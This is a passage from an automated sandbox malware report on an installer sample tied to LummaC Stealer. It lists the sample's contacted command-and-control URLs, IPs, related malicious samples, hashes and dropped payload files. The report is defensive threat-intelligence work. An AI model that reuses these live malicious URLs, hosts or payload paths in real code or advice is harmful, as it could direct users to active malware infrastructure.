                                                                                                          https://cegu.shop:443/8574262446/ph.txt@Setup.exe, 00000000.00000003.2260343868.00000000009CC000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000002.2277544592.00000000009CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          		unknown
                                                                                                          http://repository.certum.pl/cscasha2.cer0NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2305199635.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2320879946.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000003.2888927263.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                            		high
                                                                                                            http://ocsp.sectigo.com0@Setup.exe, _isdecmp.dll.9.drfalse
                                                                                                              		high
                                                                                                              https://contoso.com/Licensepowershell.exe, 00000004.00000002.2088367725.00000000060F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://dfgh.online/invoker.php?compName=user-PCppowershell.exe, 00000004.00000002.2080022379.00000000051E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://dfgh.online/invoker.php?compName=powershell.exe, 00000004.00000002.2078394262.0000000003250000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=@Setup.exe, 00000000.00000003.1844558977.0000000003429000.00000004.00000800.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1844466578.000000000342C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#@Setup.exe, 00000000.00000003.2259351038.0000000000A27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17@Setup.exe, 00000000.00000003.1844974801.0000000003483000.00000004.00000800.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1845193558.0000000003437000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://repository.certum.pl/cevcsca2021.cer0@Setup.exefalse
                                                                                                                        		high
                                                                                                                        http://go.microspowershell.exe, 00000004.00000002.2080022379.00000000052C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://laborersquei.click/v-@Setup.exe, 00000000.00000003.2008196232.0000000000A59000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1982017835.0000000000A59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0@Setup.exe, 00000000.00000003.2259351038.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000002.2288771448.0000000000A52000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2259031205.0000000000A50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.faststone.org/FSCTutorial.htmUvsv_tool.exe, 00000025.00000002.2974801805.000000000491C000.00000004.00000020.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000000.2847542627.0000000000501000.00000020.00000001.01000000.0000000E.sdmp, is-C1AV0.tmp.9.drfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://laborersquei.click/dd@Setup.exe, 00000000.00000003.1890520104.00000000033ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://x1.c.lencr.org/0@Setup.exe, 00000000.00000003.1891299674.0000000003421000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://x1.i.lencr.org/0@Setup.exe, 00000000.00000003.1891299674.0000000003421000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://crt.sectigo.com/SectigNBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2320879946.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000003.2888927263.0000000002CD0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install@Setup.exe, 00000000.00000003.1845193558.0000000003414000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://subca.ocsp-certum.com02@Setup.exefalse
                                                                                                                                      		high
                                                                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search@Setup.exe, 00000000.00000003.1844558977.0000000003429000.00000004.00000800.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1844466578.000000000342C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://subca.ocsp-certum.com01NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2305199635.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2320879946.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000003.2888927263.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                          		high
                                                                                                                                          https://contoso.com/powershell.exe, 00000004.00000002.2088367725.00000000060F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://sectigo.com/CPS0DNBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2305199635.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2320879946.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000003.2888927263.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                              		high
                                                                                                                                              http://crl.certum.pl/ctnca2.crl0l@Setup.exefalse
                                                                                                                                                		high
                                                                                                                                                http://repository.certum.pl/ctnca2.cer09@Setup.exefalse
                                                                                                                                                  		high
                                                                                                                                                  https://dfgh.onlinepowershell.exe, 00000004.00000002.2080022379.00000000051E6000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://jrsoftware.org0NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2305199635.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2320879946.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000003.2888927263.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://jrsoftware.org/NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2305199635.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2320879946.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000003.2888927263.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://laborersquei.click/&@Setup.exe, 00000000.00000002.2288771448.0000000000A55000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2259031205.0000000000A55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      		unknown
                                                                                                                                                      https://klipvumisui.shop/32@Setup.exe, 00000000.00000002.2288771448.0000000000A55000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2259031205.0000000000A55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      		unknown
                                                                                                                                                      https://support.mozilla.org/products/firefoxgro.all@Setup.exe, 00000000.00000003.1892778952.0000000003503000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2088367725.00000000060F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://laborersquei.click/apiB@Setup.exe, 00000000.00000003.1939970763.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1967598985.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1914963153.0000000000A40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://laborersquei.click/apinp@Setup.exe, 00000000.00000003.1869507760.00000000033E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://sectigo.com/CPS0@Setup.exefalse
                                                                                                                                                            		high
                                                                                                                                                            http://repository.certum.pl/ctnca.cer09NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2305199635.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2320879946.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000003.2888927263.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.ico@Setup.exe, 00000000.00000003.1844558977.0000000003429000.00000004.00000800.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1844466578.000000000342C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://laborersquei.click/apiK@Setup.exe, 00000000.00000003.1981913248.0000000000A65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                https://cegu.shop/8574262446/ph.txth;@Setup.exe, 00000000.00000002.2288771448.0000000000A55000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2259031205.0000000000A55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                		unknown
                                                                                                                                                                http://www.faststone.org/FSCTutorial.htmvsv_tool.exe, 00000025.00000002.2974801805.000000000491C000.00000004.00000020.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000000.2847542627.0000000000501000.00000020.00000001.01000000.0000000E.sdmp, is-C1AV0.tmp.9.drfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                https://laborersquei.click:443/api@Setup.exe, 00000000.00000003.1843769815.00000000009C9000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2260343868.00000000009CC000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000002.2277544592.00000000009CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#@Setup.exe, 00000000.00000003.2259351038.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2259031205.0000000000A50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://www.vmware.com/0/vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high

                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                    Public IPs

                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                    172.67.166.49
                                                                                                                                                                    		laborersquei.clickUnited States
                                                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                                                    185.161.251.21
                                                                                                                                                                    		cegu.shopUnited Kingdom
                                                                                                                                                                    		5089NTLGBfalse
                                                                                                                                                                    172.67.208.58
                                                                                                                                                                    		klipvumisui.shopUnited States
                                                                                                                                                                    		13335CLOUDFLARENETUSfalse

                                                                                                                                                                    General Information

                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                    Analysis ID:1581466
                                                                                                                                                                    Start date and time:2024-12-27 20:22:12 +01:00
                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                    Overall analysis duration:0h 11m 5s
                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                    Report type:full
                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                    Number of analysed new started processes analysed:38
                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                    Technologies:
                                                                                                                                                                    • HCA enabled
                                                                                                                                                                    • EGA enabled
                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                    Sample name:@Setup.exe
                                                                                                                                                                    Detection:MAL
                                                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@59/15@4/3
                                                                                                                                                                    EGA Information:
                                                                                                                                                                    • Successful, ratio: 66.7%
                                                                                                                                                                    HCA Information:
                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                    • Number of executed functions: 29
                                                                                                                                                                    • Number of non-executed functions: 108
                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                    • Stop behavior analysis, all processes terminated

                                                                                                                                                                    Warnings

                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                                                                                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 6020 because it is empty
                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                    • VT rate limit hit for: @Setup.exe

                                                                                                                                                                    Simulations

                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                    14:23:17API Interceptor10x Sleep call for process: @Setup.exe modified
                                                                                                                                                                    14:23:41API Interceptor17x Sleep call for process: powershell.exe modified

                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                    IPs

                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    172.67.166.49Scanjet 23002022.xlsxGet hashmaliciousAzorult gzRatBrowse
                                                                                                                                                                    • etapackbg.com/css/Sngggz.png
                                                                                                                                                                    185.161.251.21Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                      appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                                                                                                                          172.67.208.58does virginia have a no chase law for motorcycles 62848.jsGet hashmaliciousUnknownBrowse

                                                                                                                                                                            Domains

                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                            cegu.shopFull_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 185.161.251.21
                                                                                                                                                                            appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 185.161.251.21
                                                                                                                                                                            installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                                                                                                                            • 185.161.251.21
                                                                                                                                                                            laborersquei.clickinstaller_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                                                                                                                            • 172.67.166.49
                                                                                                                                                                            SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                            • 104.21.89.250
                                                                                                                                                                            klipvumisui.shopFull_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 104.21.37.128

                                                                                                                                                                            ASNs

                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                            CLOUDFLARENETUSFull_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 172.67.204.41
                                                                                                                                                                            http://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=N_pyUL0QJkeR_KiXHZsVlyTB1Qoy7S9IkE8Ogzl8coFUMFBJSDkxQ0w3VVZMNFJFUlNDRVkyU05CUi4uGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                            • 104.21.18.132
                                                                                                                                                                            http://resources.onestart.ai/onestart_installer_130.0.6723.134.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 1.1.1.1
                                                                                                                                                                            Electrum-bch-4.4.2-x86_64.AppImage.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 172.67.12.83
                                                                                                                                                                            https://franoapas.co.in/Get hashmaliciousUnknownBrowse
                                                                                                                                                                            • 172.67.221.200
                                                                                                                                                                            http://bitstampweb.hbrygl.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 172.67.136.84
                                                                                                                                                                            Solara.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                            • 172.67.165.185
                                                                                                                                                                            TrdIE26br9.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 172.67.148.171
                                                                                                                                                                            0x001f00000004676d-1858.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                            • 104.21.11.101
                                                                                                                                                                            eYAXkcBRfQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                            • 104.21.11.101
                                                                                                                                                                            NTLGBFull_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 185.161.251.21
                                                                                                                                                                            appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 185.161.251.21
                                                                                                                                                                            db0fa4b8db0333367e9bda3ab68b8042.x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                            • 81.97.105.115
                                                                                                                                                                            installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                                                                                                                            • 185.161.251.21
                                                                                                                                                                            xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                            • 163.165.65.186
                                                                                                                                                                            xd.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                            • 92.237.44.174
                                                                                                                                                                            telnet.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 80.4.135.78
                                                                                                                                                                            armv4l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                            • 62.254.229.173
                                                                                                                                                                            loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                            • 82.3.236.97
                                                                                                                                                                            loligang.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                            • 213.107.138.142
                                                                                                                                                                            CLOUDFLARENETUSFull_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 172.67.204.41
                                                                                                                                                                            http://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=N_pyUL0QJkeR_KiXHZsVlyTB1Qoy7S9IkE8Ogzl8coFUMFBJSDkxQ0w3VVZMNFJFUlNDRVkyU05CUi4uGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                            • 104.21.18.132
                                                                                                                                                                            http://resources.onestart.ai/onestart_installer_130.0.6723.134.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 1.1.1.1
                                                                                                                                                                            Electrum-bch-4.4.2-x86_64.AppImage.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 172.67.12.83
                                                                                                                                                                            https://franoapas.co.in/Get hashmaliciousUnknownBrowse
                                                                                                                                                                            • 172.67.221.200
                                                                                                                                                                            http://bitstampweb.hbrygl.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 172.67.136.84
                                                                                                                                                                            Solara.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                            • 172.67.165.185
                                                                                                                                                                            TrdIE26br9.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 172.67.148.171
                                                                                                                                                                            0x001f00000004676d-1858.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                            • 104.21.11.101
                                                                                                                                                                            eYAXkcBRfQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                            • 104.21.11.101

                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                            a0e9f5d64349fb13191bc781f81f42e1Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 172.67.208.58
                                                                                                                                                                            • 172.67.166.49
                                                                                                                                                                            • 185.161.251.21
                                                                                                                                                                            Solara.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                            • 172.67.208.58
                                                                                                                                                                            • 172.67.166.49
                                                                                                                                                                            • 185.161.251.21
                                                                                                                                                                            0x001f00000004676d-1858.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                            • 172.67.208.58
                                                                                                                                                                            • 172.67.166.49
                                                                                                                                                                            • 185.161.251.21
                                                                                                                                                                            eYAXkcBRfQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                            • 172.67.208.58
                                                                                                                                                                            • 172.67.166.49
                                                                                                                                                                            • 185.161.251.21
                                                                                                                                                                            JpzbUfhXi0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                            • 172.67.208.58
                                                                                                                                                                            • 172.67.166.49
                                                                                                                                                                            • 185.161.251.21
                                                                                                                                                                            o0cabS0OQn.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                            • 172.67.208.58
                                                                                                                                                                            • 172.67.166.49
                                                                                                                                                                            • 185.161.251.21
                                                                                                                                                                            738KZNfnzz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                            • 172.67.208.58
                                                                                                                                                                            • 172.67.166.49
                                                                                                                                                                            • 185.161.251.21
                                                                                                                                                                            mDuCbT8LnH.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                            • 172.67.208.58
                                                                                                                                                                            • 172.67.166.49
                                                                                                                                                                            • 185.161.251.21
                                                                                                                                                                            Vq50tK1Nx2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                            • 172.67.208.58
                                                                                                                                                                            • 172.67.166.49
                                                                                                                                                                            • 185.161.251.21
                                                                                                                                                                            O53VxanH6A.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                            • 172.67.208.58
                                                                                                                                                                            • 172.67.166.49
                                                                                                                                                                            • 185.161.251.21

                                                                                                                                                                            Dropped Files

                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exeFull_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpFull_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  FloydMounts.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                      setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                          GLD6WIS3RXG4KKYJLK.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                            Entropy (8bit):1.1510207563435464
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:NlllulTkklh:NllUokl
                                                                                                                                                                                            MD5:8F489B5B8555D6E9737E8EE991AA32FD
                                                                                                                                                                                            SHA1:05B412B1818DDB95025A6580D9E1F3845F6A2AFC
                                                                                                                                                                                            SHA-256:679D924F42E8FC107A7BE221DE26CCFEBF98633EA2454D3B4E0D82ED66E3E03D
                                                                                                                                                                                            SHA-512:97521122A5B64237EF3057A563284AC5C0D3354E8AC5AA0DE2E2FA61BA63379091200D1C4A36FABC16B049E83EF11DBB62E1987A6E4D6A4BCD5DDB27E7BD9F49
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:@...e................................................@..........

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\679f904c

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe
                                                                                                                                                                                            File Type:PNG image data, 2032 x 4684, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):7043853
                                                                                                                                                                                            Entropy (8bit):7.998562535252469
                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                            SSDEEP:196608:jzqqLRn623k+aKXkb4M5mXeHe1djFWgyq:jeqQLMXkbyXe+1djFiq
                                                                                                                                                                                            MD5:667C9BCB2BC991D875DB198CCD2FB30C
                                                                                                                                                                                            SHA1:67703DD819A60A8E46023967573DCD6008FBAA8A
                                                                                                                                                                                            SHA-256:381D8954975FA48B4A07624C65DE7A29BBF7DDFD0B6DFB68AAC312C7E82EC526
                                                                                                                                                                                            SHA-512:470CAC2E53058051C8CE3BA05D79C7362B717204BC7475FFA9B674AC003E65525FC366DF94EAEE9B73467233E1BAB0510A92F22941C2382767A16F28DBE3D332
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.PNG........IHDR.......L......E5... .IDATx..9.$G.....32g..X.w.tvA&P..(y.M.....r7.*Q.r.ke..*...0...3...>Vk.$.........33.##3#3.......p......./?BD.`n..DDDD\.._@...c...10.0...G.<n.E~.9./...q|J..P...59.... O.3..@...0..)....!.=..).s{v.....4MC..Oi...]J.."g.R......m....1..RJ...n..)..+..B....B...{(.T...6-9.....Pkp...MKn#...m/dx..v....M.l?""..#.."v...C.|....c..H>c.].H..M.|B57.|..)B.d.m.........;f..gg0&....n.c....0.4..6.~.T7........+:..../_..DDD.E....x...C..cL................3.y(;....)k......|;..b.cz.....y.o..l.....Y.&n.....g7.g...Rx!.....u].5...m...#...@...|....P.1....Z.M.....6...n$D.......?......q-....C....sI>...q/....G.0 ..(?4.....F....H..%..A......(..g;$_H..7`. D.......B........P..a./].o.$..I~w.D...!.._b.I..5...^)....X......k..|V.NB\.<<D..q...W$k.>..@..^..}p-..=.....k...........h.nB~W.3...r..................|.f....S....ew./.d....T..I..W.Q~.]1.O..:...|)....'V.k_.1...F.1..7l$D.......V...m.9..B\.<h.....?...<n.Q>.d.....<.T.o"..[7...H..S.._.S..N-.

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exe

